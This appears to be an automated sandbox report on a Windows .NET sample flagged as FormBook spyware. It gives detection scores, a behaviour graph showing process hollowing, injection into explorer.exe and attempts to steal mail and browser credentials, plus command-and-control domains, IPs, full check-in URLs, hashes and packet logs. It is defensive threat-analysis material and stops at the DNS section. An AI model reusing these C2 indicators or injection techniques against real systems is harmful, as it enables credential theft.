      System Information Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 756156 Sample: NHYGUnNN.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 Snort IDS alert for network traffic 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 4 other signatures 2->40 8 NHYGUnNN.exe 1 2->8         started        process3 file4 22 C:\Users\user\AppData\...22HYGUnNN.exe.log, CSV 8->22 dropped 50 Writes to foreign memory regions 8->50 52 Allocates memory in foreign processes 8->52 54 Injects a PE file into a foreign processes 8->54 12 RegSvcs.exe 8->12         started        signatures5 process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 12->56 58 Maps a DLL or memory area into another process 12->58 60 Sample uses process hollowing technique 12->60 62 Queues an APC in another process (thread injection) 12->62 15 explorer.exe 12->15 injected process8 dnsIp9 24 www.y31jaihdb6zm87.buzz 154.209.6.241, 49721, 49722, 49723 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK Seychelles 15->24 26 www.dersameh.com 89.31.143.1, 49715, 49716, 49717 QSC-AG-IPXDE Germany 15->26 28 4 other IPs or domains 15->28 30 System process connects to network (likely due to code injection or exploit) 15->30 32 Uses netstat to query active network connections and open ports 15->32 19 NETSTAT.EXE 13 15->19         started        signatures10 process11 signatures12 42 Tries to steal Mail credentials (via file / registry access) 19->42 44 Tries to harvest and steal browser information (history, passwords, etc) 19->44 46 Modifies the context of a thread in another process (thread injection) 19->46 48 Maps a DLL or memory area into another process 19->48

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      NHYGUnNN.exe28%ReversingLabsByteCode-MSIL.Trojan.Zilla
      NHYGUnNN.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      1.0.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6m0%Avira URL Cloudsafe
      http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDed0%Avira URL Cloudsafe
      http://www.y31jaihdb6zm87.buzz/4u5a/0%Avira URL Cloudsafe
      www.needook.com/4u5a/0%Avira URL Cloudsafe
      http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0s0%Avira URL Cloudsafe
      http://www.marketmall.digital/4u5a/0%Avira URL Cloudsafe
      http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O20%Avira URL Cloudsafe
      http://www.darkchocolatebliss.com/4u5a/0%Avira URL Cloudsafe
      http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0s0%Avira URL Cloudsafe
      http://www.dersameh.com/4u5a/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      www.darkchocolatebliss.com
      		54.38.220.85
      		truetrue
        		unknown
        www.marketmall.digital
        		162.213.255.142
        		truetrue
          		unknown
          www.canadianlocalbusiness.com
          		172.67.148.132
          		truetrue
            		unknown
            www.y31jaihdb6zm87.buzz
            		154.209.6.241
            		truetrue
              		unknown
              www.ope-cctv.com
              		38.55.236.89
              		truetrue
                		unknown
                www.dersameh.com
                		89.31.143.1
                		truetrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.y31jaihdb6zm87.buzz/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marketmall.digital/4u5a/?GFQD=d2J0s&l0GX=+3a19pWtZng4d4VWOC/6zX+Mtu8c5OpbMBerEkzVlILtG/Qx1KaY9rLPGpDSvmBGoypiYd46AJSA/qrnjKpXW0Tn6YTEKB73Lei52b2L1E6mtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.ope-cctv.com/4u5a/?GFQD=d2J0s&l0GX=PpVjBZYmN65mN/Cch5R9AL0rcoAD1LxI4sTzWlpX/jy1IrupfQnyd2YG9N8O4SbWoFYU5LvyeEtp38I885KIODFzvvn/7iZ+w1zSOWQrPDedtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dersameh.com/4u5a/?l0GX=DO8SLO7p+ieBn2EC0oYIAc7qa4Xo4oKKhL6K9ytUp3CH+6ohEz4QzFDvrvyjA4KB81/r5tutyqTX+rvP+Yb6ZUWqEETpfEhrV3qJRCQNMeQd&GFQD=d2J0strue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.marketmall.digital/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  www.needook.com/4u5a/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.darkchocolatebliss.com/4u5a/?GFQD=d2J0s&l0GX=pzMeEw2CLp9onsoEnnWxz7DjwWrmiPcXMIcMx0e8RMBYp3cHCqEf8wLsuyWBJtbijuVM0Zvb5p08kUy+wXRBHzYlQdhpzNTGfYmB4954z6O2true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.y31jaihdb6zm87.buzz/4u5a/?l0GX=odL+ljtDJZnnvHXGVqz6MYcHTNNFW2XRvrcwy4k99/9PUVuyA+q7lKaiZ8dF4agdsl/xXcCsqSWGiuLBWKJZJi8UVH1n7ApvhveD6637F7nt&GFQD=d2J0strue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.dersameh.com/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.darkchocolatebliss.com/4u5a/true
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=1--Lt08NN.10.drfalse
                    		high
                    https://search.yahoo.com?fr=crmas_sfp1--Lt08NN.10.drfalse
                      		high
                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.304813988.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.240724345.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.283521778.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253709611.0000000008442000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtab1--Lt08NN.10.drfalse
                          		high
                          https://duckduckgo.com/ac/?q=1--Lt08NN.10.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico1--Lt08NN.10.drfalse
                              		high
                              https://search.yahoo.com?fr=crmas_sfpf1--Lt08NN.10.drfalse
                                		high
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=1--Lt08NN.10.drfalse
                                  		high
                                  https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search1--Lt08NN.10.drfalse
                                    		high
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=1--Lt08NN.10.drfalse
                                      		high
                                      https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=1--Lt08NN.10.drfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        38.55.236.89
                                        		www.ope-cctv.comUnited States
                                        		174COGENT-174UStrue
                                        89.31.143.1
                                        		www.dersameh.comGermany
                                        		15598QSC-AG-IPXDEtrue
                                        172.67.148.132
                                        		www.canadianlocalbusiness.comUnited States
                                        		13335CLOUDFLARENETUStrue
                                        54.38.220.85
                                        		www.darkchocolatebliss.comFrance
                                        		16276OVHFRtrue
                                        162.213.255.142
                                        		www.marketmall.digitalUnited States
                                        		22612NAMECHEAP-NETUStrue
                                        154.209.6.241
                                        		www.y31jaihdb6zm87.buzzSeychelles
                                        		136970YISUCLOUDLTD-AS-APYISUCLOUDLTDHKtrue

                                        General Information

                                        Joe Sandbox Version:36.0.0 Rainbow Opal
                                        Analysis ID:756156
                                        Start date and time:2022-11-29 18:23:12 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:NHYGUnNN.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:12
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@4/2@6/6
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HDC Information:
                                        • Successful, ratio: 41.7% (good quality ratio 36.2%)
                                        • Quality average: 71.1%
                                        • Quality standard deviation: 33.6%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                                        • Execution Graph export aborted for target NHYGUnNN.exe, PID 5380 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.

                                        Simulations

                                        Behavior and APIs

                                        No simulations

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NHYGUnNN.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\NHYGUnNN.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):226
                                        Entropy (8bit):5.354940450065058
                                        Encrypted:false
                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                        MD5:B10E37251C5B495643F331DB2EEC3394
                                        SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                        SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                        SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                        Malicious:true
                                        Reputation:moderate, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

                                        C:\Users\user\AppData\Local\Temp\1--Lt08NN

                                        Download File
                                        Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                        Category:dropped
                                        Size (bytes):94208
                                        Entropy (8bit):1.2891393435168748
                                        Encrypted:false
                                        SSDEEP:192:Qo1/8dpUXbSzTPJPe6IVuvCySEwn7PrH944:QS/inmjVuaySEwn7b944
                                        MD5:037D23498B81732EEAAAD0E8015F3F85
                                        SHA1:E7719865D7717A4B36D85609F3EC25C10934587F
                                        SHA-256:83AA9D5727AD94D394C57A969A7C53C37F79513316FA5E0283A750C886F342D4
                                        SHA-512:BFFFB8C7759B65BABD232200305699551AC9BF9BF2C778D5DA124A677900869254C6AB4439BF2A99E08690C29C5A2B17EEEBA7382CF4EAAB12168462A49B3D7D
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.833885184563826
                                        TrID:
                                        • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                        • Win64 Executable GUI (202006/5) 44.25%
                                        • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                        • Win64 Executable (generic) (12005/4) 2.63%
                                        • Generic Win/DOS Executable (2004/3) 0.44%
                                        File name:NHYGUnNN.exe
                                        File size:275456
                                        MD5:4f9c8432b57fa1aa875071de547ba947
                                        SHA1:e1cc52fd851621743ba562a65161bfafed8e6b2b
                                        SHA256:9f0d17930a9312b8d8dfb23119b57fed676a1bb15fc1582754ab94201651b221
                                        SHA512:ced221c2e5225a8ead486e52f1c5307b24dbaff8864c7262f2d6f58cad3184753d1f2afe525c3afa122ddcafeab38845dafd2f7a22169bfac026375e7962481d
                                        SSDEEP:6144:RhwendE8+/O+oImP2Qcy7ZwpeA9pg6Cer0K7+UUcT9gxyRClRcOpoik:EAHdP7ZwpeApT0K7+UUQ99RORcOpoR
                                        TLSH:B24401917785748FC98ECF3B86A03859097991733B0BD39B94423CA9491E3DE5E13BA3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......c..............0......0........... ....@...... ....................................`...@......@............... .....

                                        File Icon

                                        Icon Hash:30f0c4ccccc6b010

                                        Static PE Info

                                        General

                                        Entrypoint:0x400000
                                        Entrypoint Section:
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6385B386 [Tue Nov 29 07:23:50 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:

                                        Entrypoint Preview

                                        Instruction
                                        dec ebp
                                        pop edx
                                        nop
                                        add byte ptr [ebx], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax+eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1714.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3e6600x1c.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x416280x41800False0.9183936665076335data7.879743437690199IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .reloc0x440000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        .rsrc0x460000x17140x1800False0.265625data4.38448712577448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x461300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096
                                        RT_GROUP_ICON0x471d80x14data
                                        RT_VERSION0x471ec0x33cdata
                                        RT_MANIFEST0x475280x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        192.168.2.6154.209.6.24149722802829004 11/29/22-18:25:42.914102TCP2829004ETPRO TROJAN FormBook CnC Checkin (POST)4972280192.168.2.6154.209.6.241

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 18:25:06.857711077 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.176563978 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.177164078 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.177280903 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.495994091 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496047974 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496076107 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:07.496227980 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.496602058 CET4971480192.168.2.638.55.236.89
                                        Nov 29, 2022 18:25:07.815313101 CET804971438.55.236.89192.168.2.6
                                        Nov 29, 2022 18:25:12.533631086 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.553531885 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.553693056 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.554054976 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:12.573877096 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576395035 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576421022 CET804971589.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:12.576509953 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:13.563682079 CET4971580192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.580615997 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.601016045 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.601304054 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.601547003 CET4971680192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:14.621640921 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.621699095 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.623873949 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:14.623893976 CET804971689.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.626898050 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.647209883 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.647319078 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.654036999 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.675849915 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677865982 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677930117 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.677973986 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678021908 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678031921 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678061962 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678066969 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678113937 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678148985 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:16.678157091 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678191900 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.678610086 CET4971780192.168.2.689.31.143.1
                                        Nov 29, 2022 18:25:16.698600054 CET804971789.31.143.1192.168.2.6
                                        Nov 29, 2022 18:25:21.757518053 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.776348114 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.776595116 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.776768923 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:21.795433998 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795470953 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:21.795599937 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.783147097 CET4971880192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:22.801913977 CET804971854.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.803277016 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.821763039 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.821918011 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.822163105 CET4971980192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:23.840464115 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840503931 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:23.840524912 CET804971954.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.846643925 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865328074 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.865495920 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.865695000 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.883969069 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884027958 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884074926 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:25.884263992 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.884419918 CET4972080192.168.2.654.38.220.85
                                        Nov 29, 2022 18:25:25.902769089 CET804972054.38.220.85192.168.2.6
                                        Nov 29, 2022 18:25:31.069607019 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.454494953 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:31.454699993 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:31.457118988 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.221436024 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.471544981 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606439114 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606645107 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606683016 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.606717110 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.606791973 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:32.856290102 CET8049721154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:32.856455088 CET4972180192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:33.490314960 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:36.508388996 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.519331932 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.913681030 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:42.913929939 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:42.914102077 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.308163881 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:43.308239937 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:43.925580978 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.097312927 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.491835117 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.491909027 CET8049722154.209.6.241192.168.2.6
                                        Nov 29, 2022 18:25:44.492044926 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.494973898 CET4972280192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:44.942090988 CET4972380192.168.2.6154.209.6.241
                                        Nov 29, 2022 18:25:45.283199072 CET8049722154.209.6.241192.168.2.6

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 29, 2022 18:25:06.826121092 CET5950453192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:06.849574089 CET53595048.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:12.510191917 CET6519853192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:12.532123089 CET53651988.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:21.723710060 CET6291053192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:21.755763054 CET53629108.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:30.897186995 CET6386353192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:31.068085909 CET53638638.8.8.8192.168.2.6
                                        Nov 29, 2022 18:25:50.761020899 CET6322953192.168.2.68.8.8.8
                                        Nov 29, 2022 18:25:50.808146954 CET53632298.8.8.8192.168.2.6
                                        Nov 29, 2022 18:26:01.743686914 CET6253853192.168.2.68.8.8.8
                                        Nov 29, 2022 18:26:01.772579908 CET53625388.8.8.8192.168.2.6

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 29, 2022 18:25:06.826121092 CET192.168.2.68.8.8.80x2214Standard query (0)www.ope-cctv.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:12.510191917 CET192.168.2.68.8.8.80x7524Standard query (0)www.dersameh.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:21.723710060 CET192.168.2.68.8.8.80x2444Standard query (0)www.darkchocolatebliss.comA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:30.897186995 CET192.168.2.68.8.8.80xa02aStandard query (0)www.y31jaihdb6zm87.buzzA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:25:50.761020899 CET192.168.2.68.8.8.80xeb7dStandard query (0)www.marketmall.digitalA (IP address)IN (0x0001)false
                                        Nov 29, 2022 18:26:01.743686914 CET192.168.2.68.8.8.80xd179Standard query (0)www.canadianlocalbusiness.comA (IP address)IN (0x0001)false

                                        DNS Answers

